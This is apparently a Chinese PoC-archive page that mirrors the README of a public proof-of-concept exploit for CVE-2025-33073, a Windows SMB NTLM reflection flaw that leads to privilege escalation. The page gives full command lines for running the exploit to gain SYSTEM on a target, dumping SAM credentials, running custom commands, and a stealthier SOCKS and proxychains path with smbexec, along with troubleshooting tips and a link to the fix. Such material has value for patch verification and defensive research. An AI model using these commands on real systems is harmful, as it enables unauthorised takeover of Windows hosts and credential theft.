POC详情: c1122fea0c6276bee22c0611b66860b6bade0b22

来源
https://github.com/mverschu/CVE-2025-33073
关联漏洞
标题: Microsoft Windows SMB Server 访问控制错误漏洞 (CVE-2025-33073)
描述:Microsoft Windows SMB Server是美国微软(Microsoft)公司的一个网络文件共享协议。它允许计算机上的应用程序读取和写入文件以及从计算机网络中的服务器程序请求服务。 Microsoft Windows SMB Server存在访问控制错误漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 11 Version 22H2 for x64-based Systems,Wi
描述
PoC Exploit for the NTLM reflection SMB flaw.
介绍
# CVE-2025-33073
PoC Exploit for the NTLM reflection SMB flaw.

All credits go to the offical research:</br>
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

### Prerequisites
OS: Kali Linux (has most packages pre-installed).

* NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
* impacket-ntlmrelayx
* dnstool.py (included in repo)
* xterm (only for GUI)

### Example usage
**GUI**
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
```
![image](https://github.com/user-attachments/assets/83ce744a-161e-4c0f-9f2d-6d57f23a913c)

**CLI**
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
```
![image](https://github.com/user-attachments/assets/fff4fcde-0a93-43c9-b93e-990554ccb689)

**Custom command**</br>
Instead of running secretsdump a custom command can be executed.
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
```
![image](https://github.com/user-attachments/assets/1a054df7-ba08-4c9c-a4cf-737eb0827534)

**SOCKS**</br>
For more stealthy execution of commands after valid connection as SYSTEM has been made. --target and --target-ip should be equal here.
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
```
![image](https://github.com/user-attachments/assets/8cf77803-f417-4abe-a993-746049b2634c)
Also a custom command can be ran through proxychains instead of dumping SAM.
```
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
```
![image](https://github.com/user-attachments/assets/6ecf0e32-ccd2-4a61-a024-644b214607ea)

### Manual exploit without DNS requirement
If you're in the same broadcast domain as the device and it's vulnerable for LLMNR poisioning it's possible to exploit a device without having to register a DNS record.

![image](https://github.com/user-attachments/assets/20c81ea0-88bf-4334-98aa-d2cb93f473b1)


### Troubleshooting

* I've seen the attack not work sometimes because the hostname is used for the attack which results in a DNS lookup from Kali. If Kali is not using the DNS server or you get a '/ FAILED' message from impacket-ntlmrelayx try adding the host to your /etc/hosts file. This should result in the attack working.
* If using IP the attack should work. Sometimes running it multiple times will result in a SUCCESS instead of failure. It's until now not perfectly clear why this happens. I think it has something to do with networking.
* Try another coerce method using -M or --method.

#### Wireshark

**Local NTLM authentication takes place**
![image](https://github.com/user-attachments/assets/0a3fe643-2d52-427a-91f2-991770732f62)

**Local NTLM authentication does not take place resulting in a FAILED attempt**
![image](https://github.com/user-attachments/assets/7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348)

#### Good to know
* xterm allows copying and pasting with the middle mouse button.
* DNS-record should also be known to the client, this can take more time in some occasions. With more time I mean give it a couple of minutes.
* This is just a PoC which means AV/EDR bypasses have not been tried to bypass. Use at own risk.
</br>

### How to fix
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073
文件快照

 [4.0K]  /data/pocs/c1122fea0c6276bee22c0611b66860b6bade0b22
├── [5.5K]  CVE-2025-33073.py
├── [ 23K]  dnstool.py
├── [4.0K]  lib
│   ├── [4.0K]  clients
│   │   ├── [5.0K]  httprelayclient.py
│   │   ├── [3.7K]  __init__.py
│   │   ├── [2.6K]  ldaprelayclient.py
│   │   └── [9.3K]  smbrelayclient.py
│   ├── [   5]  __init__.py
│   ├── [4.0K]  __pycache__
│   │   └── [ 141]  __init__.cpython-313.pyc
│   ├── [4.0K]  servers
│   │   ├── [4.9K]  dnsrelayserver.py
│   │   ├── [10.0K]  httprelayserver.py
│   │   ├── [ 133]  __init__.py
│   │   └── [ 29K]  smbrelayserver.py
│   └── [4.0K]  utils
│       ├── [1.8K]  config.py
│       ├── [   5]  __init__.py
│       ├── [ 13K]  kerberos.py
│       ├── [2.7K]  krbcredccache.py
│       ├── [4.0K]  __pycache__
│       │   ├── [ 147]  __init__.cpython-313.pyc
│       │   ├── [ 15K]  kerberos.cpython-313.pyc
│       │   ├── [4.0K]  krbcredccache.cpython-313.pyc
│       │   └── [8.9K]  spnego.cpython-313.pyc
│       └── [5.0K]  spnego.py
└── [3.8K]  README.md

6 directories, 22 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。